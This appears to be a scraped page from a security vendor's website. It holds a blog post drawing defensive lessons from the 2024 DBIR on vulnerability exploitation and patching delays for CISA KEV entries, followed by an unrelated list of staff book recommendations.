Historically, phishing has been one of the most successful attack paths for our adversaries, and the volume of lost and stolen credentials is stunningly huge. However, organizations have been steadily investing in both more advanced phishing protection (including awareness training); and, credential blasts are both noisy and increasingly thwarted as organizations rely more heavily on elevated protections provided by identify and authentication providers like Okta.
Conversely, using internet infrastructure to find and exploit vulnerable, exposed services can be a risk-free activity for attackers, and there is an almost endless supply of both new vulnerabilities and unpatched hosts. GreyNoise excels at identifying this activity, and we provide the timeliest and most comprehensive information on those attack types and sources, bar none.
It was also a bit distressing, but not unsurprising (given Figure 6) seeing that vulnerability exploitation was at the heart of third-party-related breaches.
Every defender should print out page 21 of the 2024 DBIR and tape it to their wall (or, cubicle, if you’re in the 50% of IT folks still commuting to offices).
Most cybersecurity folks are not familiar with the “survival analysis” shown in Figure 19. It’s just a fancy way of estimating the time until some event occurs. This analysis focuses on vulnerability remediation data (i.e., “patching”), with an emphasis on how long it takes organizations to patch vulnerabilities in CISA’s Known Exploited Vulnerabilities (KEV) catalog.
GreyNoise researchers are huge fans of CISA KEV. We even benchmark ourselves against it! We meet or beat CISA over 62% of the time when it comes to having a tag ready for defenders to use. How do our customers use these tags? Well, the primary way is to block activity from IP addresses associated with these tags. While this may not prevent pinpoint targeted attacks, it absolutely buys them time to keep safe from opportunistic attacks, and helps them identify those targeted attacks much faster, and with greater precision.
Our own data clearly shows that once a proof-of-concept (PoC) is available, attackers waste zero time going after vulnerable systems. And, there is increasingly little daylight between when a CVE is published and when a PoC becomes available.
Seeing that 85% of CISA KEV entries remain unpatched after 30 days clearly shows that most organizations have no time to patch. This means protecting these assets from harm during that 30-day exposure is paramount.
The DBIR team used the “open door” metaphor for how attackers made their way into organizations in 2023. At GreyNoise, we’re highly focused on helping organizations safeguard every single entry point in their internet-facing infrastructure, while also laying out some of our own trapdoors to help confuse and ensnare them.
With GreyNoise, organizations can gain an edge over their adversaries, using our advanced sensors to identify targeted attacks quicker than ever before. Combined with the proven, battle-tested intelligence in our existing Noise dataset, defenders now have the tools to both make it extremely difficult for attackers to be successful, and slow them down long enough to finish asset remediation efforts. Join us as we work to chip away at the million-incident record the DBIR set this year, and turn the tide against our combined foes! You can get started with our data here, or connect with our team to talk about advanced features.
.png)
💡 AWS Made Easy Livestream Ep. 99.5 | Rahul Subramaniam + Stephen Barr
Thoughts: Ezra’s Klein’s interview with the CEO of Anthropic is an interesting discussion about the speed of growth of the industry and the impact AI will have on our electricity consumption, the impact on jobs, and more. Very interesting listen!
🚀 Book: The Ascendant Wars: Hellfire | Rhett C. Bruno & M.B. Vance
Why I like it: It has stylistic and narrative elements like The Expanse novels, and presents an intriguing future where some humans (dubbed Wardens) have outgrown their humanity thanks to bioengineering and rule the galaxy with ruthless efficiency. This story centers around the folks impacted by a particularly horrible Warden who decides to mess with the pseudo-stability of the regime in order to gain control. Excellent writing.
🪙 Article: Lessons after a half-billion GPT tokens | Ken Kantzer
Thoughts: It was a good read as well. I don't necessarily agree with all the points, but the author's practical take on making real-world apps with "AI" is very refreshing amidst all the hype.
💨 Atmospheric Disturbances | Rivka Galchen
Why I like it: This brilliant, disturbing novel centers on a psychiatrist suddenly convinced his wife has been replaced by an imposter (presumably a reference to a real disorder, Capgras delusion) and that the secret to finding his real wife is hidden in an obscure paper by a research meteorologist—clearly based on the author’s own father. Hilarious, insightful, surprisingly punny—and though written in 2006, the bite-sized chapters are perfect for our age of internet distractions (just me?).
🚪 The Saint of Bright Doors | Vajra Chandrasekera
Thoughts: Incisive, bizarre, and with a last-act twist that slides perfectly, yet shockingly, into place, The Saint of Bright Doors is certainly deserving of its string of award nominations. I saw Chandrasekera read an excerpt from this book on his tour; he chose the scene where the protagonist’s mother tells her son “the doctors will tell you I’m dying of cancer . . . but really it’s because I’m disappointed in you.” But Bright Doors does not disappoint.
🐉 The Dragon Waiting | John M. Ford
TLDR: Neil Gaiman wrote that this book “contains no dragons”. It’s not quite true—and Gaiman’s full quote contains a qualifier that I’m cunningly concealing from you—but close enough. Now consider what it means to recommend a dragonless book about dragons. Familiarity with the Wars of the Roses and strong opinions about the Byzantine empire will be greatly rewarded.
🪄 Book: Maximum Entertainment 2.0 | Ken Weber
Why I like it: It is a book about having a more interesting stage presence as a magician. I'm not a (professional (or good)) magician, but telling stories and being interesting on stage applies to all of us!
🧛 Book: The Twelve | Justin Cronin
Backstory: Vampire fiction might be too embarrassing to post…for context, I go to the local used bookstore to buy random books. I bought "The Passage" by Justin Cronin and got sucked into (🥁) the story about the world being overrun by a vampire virus. Halfway through, I realized it's a trilogy; now I'm halfway through the second book ("The Twelve"), with the third ready to go.
🌟 Textbook: Improv 101 | Jet City Improv
Thoughts: Improv classes are a great way to meet people, build confidence, and have fun in a super supportive environment!
🧠 Book: Being You: A New Science of Consciousness | Anil Seth
Thoughts: It is a nice read. Basically, “the entirety of perceptual experience is a neuronal fantasy that remains yoked to the world through a continuous making and remaking of perceptual best guesses, of controlled hallucinations.” Or how I stopped worrying and learned to love the absence of free will.
Please update your search term or select a different category and try again.
